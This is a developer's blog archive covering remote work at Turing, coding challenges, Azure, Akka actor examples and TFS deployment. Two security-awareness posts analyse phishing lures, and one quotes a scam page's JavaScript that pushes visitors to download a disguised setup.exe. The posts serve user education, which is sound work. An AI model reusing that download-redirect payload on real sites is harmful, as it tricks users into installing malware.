Becoming a Remote Developer at Turing

Posted by Malisa Ncube on

I have blogged about things that you’d want to consider if you’d like to become a Software Developer in Silicon Valley working remotely at Turing.

In this post, I talk about, preparation, how to ace the tech questions and interviews, some gotchas and general advice on things you’d want to keep in mind.

Visit for the details

Feel free to ask questions on the Turing blog. Good luck!

Codility code challenges – The initiation

Posted by Malisa Ncube on

I only discovered Codility a few weeks ago and realised that it is used by quite a number of developers for code challenges, just like Hackerrank and Project Euler. It seems to be the new kid on the block but has become very popular and clearly I’ve been living under a rock not to know what is happening in that world.

I immediately created a new repository where I started committing some solutions to challenges that I saw. These solutions are for practice and may not all be running in O(1), O(log n) or O(log n) time or space as often required. In short, some may be inefficient to enable reasoning towards faster solutions and I’ll keep those old versions to enable my thought story to remain persisted.

The link is and depending on the challenge source, I should also start having hackerrank, project euler, pramp among others. I already have 25 scripts in this repo. πŸ™‚

I think this is going to be fun. I’ll discuss some of the challenges that I find interesting here. I will mainly use Python and C# as languages. LinqPad and VSCode are the tools of choice. In the process I hope to learn some of the new Python 3.0 syntax.

While I generally like code challenges, I think they miss critical parts of software development, which is Architecture, Teamwork, Work Ethic and other soft skills . I think they should not be solely used to determine if the developer is excellent. They are good to see how the engineer thinks and distills an idea from usually a brute force approach to a better solution and how the handling of edge cases.

If you’re also interested in these kind of things, ping me and we share ideas.

Back online

Posted by Malisa Ncube on

This is my quick way to get back online. Its been a while and my attempt in running a node.js based site on this platform failed because of permissions and all tricks were also met with some forms of blockage.

Now, I’m thinking about my old content. Wondering if I should try and import it here or just start from scratch. I also used to blog on sometime back, until I moved to a ghost blog engine that I was running on Azure on this domain. There were many iterations of ghost blog and the authors changed the installation procedure too and I could not keep up. The best way is to use their subscription service which keeps you up to date with features and security patches. I’ve then just decided to go simple – WordPress.

Its sad that cPanel still cannot run .NET Core. I’d really love to see that happen soon, and possibly get OrchardProject.Net for this. I love WordPress and have so much respect for it as a product, and it has stood time, has received many security patches because as you know, hackers like to attack the most popular products. I’d love a .NET centric site more because I’d find it easier to continuously tweak it or ticker with stuff on it.

Anyways, I called this site .NET delights, when its actually not only about .NET. Its about all coding I do in general and some other stuff I create including music and poetry. I intend to collate all content here and hopefully it will enable me to document some of the stuff I like to do.

This site contains my views and not those of any organisation.

Catch you on the next posts. πŸ˜€

Speaking at Geeknight at Outbox

Posted by Malisa Ncube on

Hey Geeks!

I will be speaking at Geeknight Event at Outbox on the 26 April 2016 from 6:00 PM to 8:00 PM.

It will be about designing distributed applications. This time we will look into design challenges and considerations you would want to know about before you let your application loose into the wild.

Some of the areas we will look at include the following:

  • Designing for scale
  • Dealing with streaming data
  • The reactive manifesto
  • Performance pain points
  • Azure Service Fabric
  • And many more…

This talk will not get into religious debates about whether Java is better than C# or Django than Rails.

We will also review some code and discussions. It will be fun!

Does this sound interesting? I think it does, so register here now!

See you there.

Xamarin Bug on Properties page

Posted by Malisa Ncube on

I have been using Xamarin for a while and consistently I have come to realise a bug which causes Visual Studio to freeze. This happens when you’re loading a solution. In my case, if I make some changes to the properties window of anything which uses Android SDK save, close the solution without closing the properties page the next time I open that solution VS will fail to load it. I have to kill the VS process from the task manager. No matter what how many times I restart VS, the solution will never load.


I’m using VS2015. You need to close VS and then delete the .suo file from



It is a hidden file so you need to show the file first using the following method

Avoid getting hacked 2 – Suspicious Emails

Posted by Malisa Ncube on


This morning I received a very interesting email. It urged me to process a purchasing order and had a couple of attachments in it.

Most computer users would probably just download the attachments, double-click and proceed to open. This particular one is very interesting in that it managed to escape the anti-virus application and seemed really legitimate. This is an email which you may receive in your company and you simply open it without knowing what it may do. So I set out to look at it a little deeper.

The following is the screenshot of the email

Would you think this email may be a beginning of a cyber-attack? Well… It could be.

As anyone would do I opened the attachments and found the following. A zipped executable file with a fake jpeg extension as part of the name – I was careful not to run the executable. The rest of the attachments were useless pdf with schematics and some Iranian addresses.


I fired-up my PEBrowser and tried to inspect the contents of “Technical Data Specifications jpeg.exe”. The result was as follows.

I realised it’s a .NET application compiled with 3.5 framework. You can see that it imports the Microsoft Runtime Execution Engine library – mscoree.dll which is part of the .NET framework. It also clearly shows .NET methods section which has 274 Methods and 49 classes. It was indeed and executable file and I made effort to inspect the IL quickly.

It was obfuscated to prevent people like me from trying to understand what is happening under the hood. I tried using dotPeek to decompile it and search for anything suspicious like PInvokes. Because of obfuscation I could not tell the logic very well even through PEBrowser. The IL was confusing because the most names had been scrambled to incomprehensible strings. I then saw this.

There is PInvoke to the Kernel32.dll. The program does interact with the system copying files – which in this case I don’t know.

There is quite a lot of logic in this application and not clear what it does, it probably does something very harmful. I’m sure it is not designed to give you Christmas gifts or sing you a lullaby.

I wonder why this was allowed to propagate into my email client. Is it because its a .NET program and Antivirus applications “trust” it? Given that it runs on .NET 3.5 the surface area of attack is very wide, which is good news for the attacker.

So next time you open an email, check carefully for the kind of attachments as you could be a victim of hacking.

Looks like the days of “I love you” worm are back, but exploiting .NET rather than VBS.

I found this link to be good for non-technical people

10 Wishes I have for Microsoft Azure

Posted by Malisa Ncube on

These are some of the wishes I have for Windows Azure using Visual Studio. I wish I could tick all of them off as available or be found wrong in thinking that they don’t exist when they actually do. They have either not been straightforward or seemed completely absent and have made me lose a lot of hair, gain weight and wish for a beer on Monday morning.

Lets get right into it.

  1. Reverse engineer all settings from a subscription and generate a powershell script which when I run against another subscription I would get exactly the same configuration.

  2. DocumentDb to be improved to support IQueryable. I want to simply write a linq statement and the SQL expression is generated and I don’t have to write the SQL query my self – I feel like I’m going back to 1980. I am thinking of customising a linq translator online for this and get my repository cleaner.

  3. There is little to no documentation for using Azure CDN online. Let me not even mention best practices or samples.

  4. While its good that Azure ServiceBus supports AMQP, it would be nice to support more. e.g. MQTT – if IoT is the future why is this not reflected here?

  5. HDInsight clusters are insanely expensive. You set it up today with minimal cores and the next 2 days it has consumed a sizable chunk of your balance.

  6. HBase SDK is almost unusable. It will be nice if the SDK was complete and we could have a proper Northwind sample or NerdDinner that will follow good practices e.g. Unit Testing, BDD, Repositories, Desired State Configuration, Continuous Delivery and such. Have a way to map to entities.

  7. The schema evolution of the database is still not Azure friendly. e.g. What happens if you want to force drop/create.

  8. Entity framework does not seem geared for sharding on Azure

  9. I think it would be nice to enable better reporting on errors/exceptions. Maybe have a debug deployment which compiles with debug symbols and gives you a more details stacktrace.

  10. Publishing from Visual Studio sometimes works and sometimes it doesn’t. I have noticed that making major changes to the project and publishing using Visual Studio tools does not properly clean the existing installation often resulting in old files and new files all thrown around the installation folder. I normally have to delete my webapp and recreate it to have this work. Very frustrating.

Akka – A peek into the parallel cloud

Posted by Malisa Ncube on

1) Introduction

In the past few weeks I decided to enter the distributed parallel computation model that is influenced by Actors and characterized by passing of messages, examining and processing messages. This model maps well to cloud computing as there is no shared state which would cause major concurrency problems. The Actor system came from research work by Carl Hewitt in the 70’s and is quickly gaining popularity recently with many projects coming into the limelight including Microsoft Project Orleans, Akka.Net among others.

Halo is a popular game which is played by many people around the world. It uses a distributed model that enables collection of game data from players, crunching of that data and producing complex aggregates and statistics in relation to the performance each of the gamers.

With so many connected services and the new Internet Of things (IoT) paradigm, we are left with a challenge of manipulating large amounts of data, transmitting larger amounts of data and satisfying the user need of instant feedback/results while battling with latency and inherent complexity of concurrency.

Parallelism and Concurrency are different and I will spare you the semantics.

Quoting Sun’s Multithreaded Programming Guide:

Concurrency: A condition that exists when at least two threads are making progress. A more generalized form of parallelism that can include time-slicing as a form of virtual parallelism.

Parallelism: A condition that arises when at least two threads are executing simultaneously.

The focus of my post is not going to be about shared state parallelism or multi-core development that can give you gains by leveraging the multiple processors. These can be implemented using many approaches including threads or thread pools. In the .NET world you would select from many language features including async/await with the Task Parallel Library (TPL) creating Task-based Asynchronous Programming (TAP), PLINQ, Event-based Asynchronous Programming (EAP) or the TPL dataflow library and Reactive Extensions (Rx).

With scalability which requires multiple threading, cores, machines and geolocation we land into distributed applications and the bigger the scale the more we need to understand that failure will happen and we need to embrace it gracefully. The Actor model enables us to adopt the β€œLet it crash” philosophy knowing that the failed components will be restored to proper state.

2) Akka

This is by no means an exhaustive look into Akka, but an introduction based on my assimilation from a couple of sources. I have found it very interesting and think it is a toolkit I’d like to adopt for cloud applications and most specifically the .NET port.

Akka is a fast growing toolkit that promises easier development of powerful concurrent, fault tolerant, event driven and distributed applications on the JVM. Akka is a message based open-source library with support for Java and Scala and has a .NET /Mono port. It enables creation of lightweight actors that pass messages to each other, create new actors and perform computations.
An important part about this toolkit is integration. There are several parts that make up Akka

  1. Actor model which enables re-integration of data within one machine
  2. Cluster / remoting integrate between subsystems
  3. Http for external systems

With Akka, some of the main things are maximum throughput with acceptable latency and proper scalability to unlimited number of connections, server and client side support and open or composable api. More specifically the Akka-http is focused on fully asynchronous / non blocking, actor friendly, lightweight, composability and is based on codebase and experience.

Lets look at a simple scala example below

    import{ ActorRef, ActorSystem, Props, Actor, Inbox }
    import scala.concurrent.duration._

    case object Greet
    case class WhoToGreet(who: String)
    case class Greeting(message: String)

    class Greeter extends Actor {
      var greeting = ""

      def receive = {
    case WhoToGreet(who) => greeting = s"hello, $who"
    case Greet   => sender ! Greeting(greeting) // Send the current greeting back to the sender

    object HelloAkkaScala extends App {

      // Create the 'helloakka' actor system
      val system = ActorSystem("helloakka")

      // Create the 'greeter' actor
      val greeter = system.actorOf(Props[Greeter], "greeter")

      // Create an "actor-in-a-box"
      val inbox = Inbox.create(system)

      // Tell the 'greeter' to change its 'greeting' message
      greeter.tell(WhoToGreet("akka"), ActorRef.noSender)

      // Ask the 'greeter for the latest 'greeting'
      // Reply should go to the "actor-in-a-box"
      inbox.send(greeter, Greet)

      // Wait 5 seconds for the reply with the 'greeting' message
      val Greeting(message1) = inbox.receive(5.seconds)
      println(s"Greeting: $message1")

      // Change the greeting and ask for it again
      greeter.tell(WhoToGreet("typesafe"), ActorRef.noSender)
      inbox.send(greeter, Greet)
      val Greeting(message2) = inbox.receive(5.seconds)
      println(s"Greeting: $message2")

      val greetPrinter = system.actorOf(Props[GreetPrinter])
      // after zero seconds, send a Greet message every second to the greeter with a sender of the greetPrinter
      system.scheduler.schedule(0.seconds, 1.second, greeter, Greet)(system.dispatcher, greetPrinter)


    // prints a greeting
    class GreetPrinter extends Actor {
      def receive = {
    case Greeting(message) => println(message)

We can see that at the beginning we create an Actor system, this will provide a container for the actors we will have in our application. We then create the greeter actor which inherits from the Actor base class, place it in our actor system. We can then send messages to the Actor using the actor system or directly.

Akka also provides reactive streams based API, enabling you to throttle responses to reduce the back pressure where the client tries to download 20Gb of data. The are an abstraction for asynchronous and non-blocking pipeline processing. This enables automatic handling of back pressure. There is a joint effort of Netflix, Twitter, RedHat, Pivotal and TypeSafe.

The .NET example below shows the same thing. The actor system is created and then messages are sent to the actors. The example below is more elegant because of generics. This example is part of the development repository on

    using System;
    using Akka.Actor;

    namespace HelloAkka
        class Program
            static void Main(string[] args)
                // create a new actor system (a container for actors)
                var system = ActorSystem.Create("MySystem");

                // create actor and get a reference to it.
                // this will be an "ActorRef", which is not a 
                // reference to the actual actor instance
                // but rather a client or proxy to it
                var greeter = system.ActorOf<GreetingActor>("greeter");

                // send a message to the actor
                greeter.Tell(new Greet("World"));

                // prevent the application from exiting before message is handled

    public class GreetingActor : ReceiveActor
        public GreetingActor()
            // Tell the actor to respond to the Greet message
            Receive<Greet>(greet => Console.WriteLine("Hello {0}", greet.Who));

    public class Greet
        public string Who { get; private set; }

        public Greet(string who)
            Who = who;

Dowloading the from github gives you the following.

Naturally some of the examples are in F#. Some of the Akka

Other Benefits of using Akka include

  • Properly typed model for requests and responses and nested entities
  • Entities can have arbitrary size
  • It can now receive message headers before entity
  • Server side routing DSL
  • Testing routes
  • Client side APIs
  • JSON support
  • Compression and Decompression (GZip/Deflate)
  • Immutable
  • Efficient http parsing and rendering
  • Powerful DSL for server-side REST API definition
  • Route structure testkit

I am watching the Akka.NET project and very optimistic about where it is going. I am working examples and a deeper diver into the internal mechanics of the .NET port and most specifically its work on Microsoft Azure.

Reactive Extensions –
Halo –
Carl Hewitt –
Orbit Framework –,
Project Orleans –

Avoid getting-hacked – Watch out for trojans

Posted by Malisa Ncube on

Earlier today, I received a message on Skype on my PC from a friend.

Malisa Ncube video: πŸ™‚

The message came through a contact on Skype, who I suspect has infected his PC. On clicking the link, one would see a screen like this below.

It quite deceptive in that, it pretends to be buffering the video and the play button in the center glows like any common video you can play. It was quite suspicious for me in that moment because I was accessing internet from a restricted network which does not allow videos, YouTube, and other social networks. I was curious, so I clicked the play button. The site pretended to be loading and then displayed the following message.

This was even more interesting because, I wondered what plugin I need to run this video. My first assumption was that when I click on the Install plugin… button it would redirect me to and enable me to install flash before redirecting back to the site, but No. Clicking on the link downloads a setup.exe file which you don’t know what it may do to your PC.

Lets get back to the beginning and look at the address bar. It reads

so I tried a couple of things. I changed it to

and you may already suspect what happened. The initial impression is that of a video personalised to you, but by changing the url to Saggy Pants, it will be dedicated to Mr Saggy Pants. Now lets look at the source.

The code that presents the install button is as follows

            <div id="cap">
                <p><img src="images/icon.png?id=5"></p>
                <p>A plugin is needed to display this video</p>
                <p><button onclick="nw()">&nbsp;Install plugin...&nbsp;</button></p>

By clicking on the button you invoke the nw() function shown below. The entire site is made up of one HTML file with javascript embedded and the truth is there is no video to talk about here. The player you see on the first page is drawn by a CSS style.

        var nw=function(){

            var b="http://"+location.hostname+"/setup.exe";
      "data:text/html,"+encodeURIComponent("<html><head><script>window.location.href='about:blank';\x3c/script></head></html>"),"__dFrame");window.setTimeout(function(){var a=window.document.createElement("script");a.type="text/javascript";a.text="window.location.href='"+b+"'";___newWindow.document.head.appendChild(a)},100)

            ga('send', 'pageview', '/d');


I also noticed the developer of the site is interested in analytics of his site. So he embedded some google analytics on it as follows.

There is also a comment box below which look like it will post the comment to your facebook account. The code is shown below. Check the data-href πŸ™‚

        <div id="comments">
            <div style="position:absolute;top:0;right:0;width:100%;height:400px;z-index:9999"></div>
            <div id="fb-root"></div>
            <script>(function(d, s, id) {
              var js, fjs = d.getElementsByTagName(s)[0];
              if (d.getElementById(id)) return;
              js = d.createElement(s); = id;
              js.src = "//";
              fjs.parentNode.insertBefore(js, fjs);
            }(document, 'script', 'facebook-jssdk'));</script>
            <div class="fb-comments" data-href="" data-width="1000" data-numposts="5" data-colorscheme="light"></div>


NOTE: So next time you open a link, it is important to ensure that it does not prompt you to download some setup file that will possibly enable the hacker to gain access to your PC, or spread through your Skype application sending messages to your contacts.

Opensource Azure with TFS Online

Posted by on

As you may know; Azure is an open platform enabling deployments from many programming languages including PHP, NodeJS and various operating systems.


There is a scenario which I have been trying to experiment with. This is enabling Visual Studio Online for non-TFS projects. This would enable me to throw a PHP project without Source Control Explorer or Visual Studio onto the repository and have somehow the deployment automagically get pushed to my linked Azure site.

The ALM powers of TFS Online are simply hard to resist for me. Some of them include.

  • Managing development teams and collaboration.
  • Managing backlogs iterations and project tasks.
  • Bug tracking
  • Version control (you can use git for this if you want)
  • Security
  • Managing builds and continuous testing and deployment
  • From the control panel, it seems there is extensibility on the services. Currently I see the Azure service. We are probably going to see more services there, hopefully it’d also be possible for third party companies to add services on the control panel.

While this list is not exhaustive of the features you get from TFS online, it presents some of the things I need if I’m developing any project.

You may recall the Windows Azure Websites already supports deployment through git. This option enables you to collaboratively work with your co-admins to continuously work an push changesets onto Azure.


I spent a while with my friends who wanted to use the features of both TFS online and Azure in one seamless process. They wanted to consolidate their tasks into one portal which would give them a window into how the project is running, prevent delays and present the true picture of the project that can be communicated to their customers, while enabling linkages with code, bugs and visibility on all the finer intricacies. They were tired of using spreadsheets which are not up-to-date and the disconnect caused by the fact that developers don’t want to document stuff and there was no clear picture of what they were doing. There was no clear bug management system, putting a lot of mental pressure on developers to remember bugs, their location and status :).

These guys are strictly Linux/PHP/MySQL and have a beautiful solution. We had to host it in a powerful platform.


The natural approach was to create a new team project in and link it to azure website. But remember this project is not a Visual Studio project and the developers had no Team/Build Explorer and develop their sites mostly using Notepad like IDEs. First of all, when you create a project on, the build is disabled by default – I ‘m not sure why it is like this. Secondly, if you somehow install a Team Explorer plugin and enable it remotely you will get the following error message.

TF277005 : Access Denied.

TF277005 : Access Denied.

From this, I suspected that if you are not using Visual Studio tooling and possibly the MSBuild files, you may not succeed in this approach. I stand to be corrected on this.

We then decided to come up with a simple solution presented by Scott Hanselman here.

We simply created two remote locations. One for Windows Azure and the other for TFS online. We then created simple bash scripts that push to both repositories. We them later improved the scripts so that deployment to Azure was a specific process, which was done through a specific one-click script. We did not like the idea of pushing changes and they are immediately reflected without proper sanctioning by all the stakeholders.

I hope in the near future we will have a standard set of commands that can be remotely executed to enable tests and build scenarios of non-MS Build projects in TFS Online.

You can get more information from below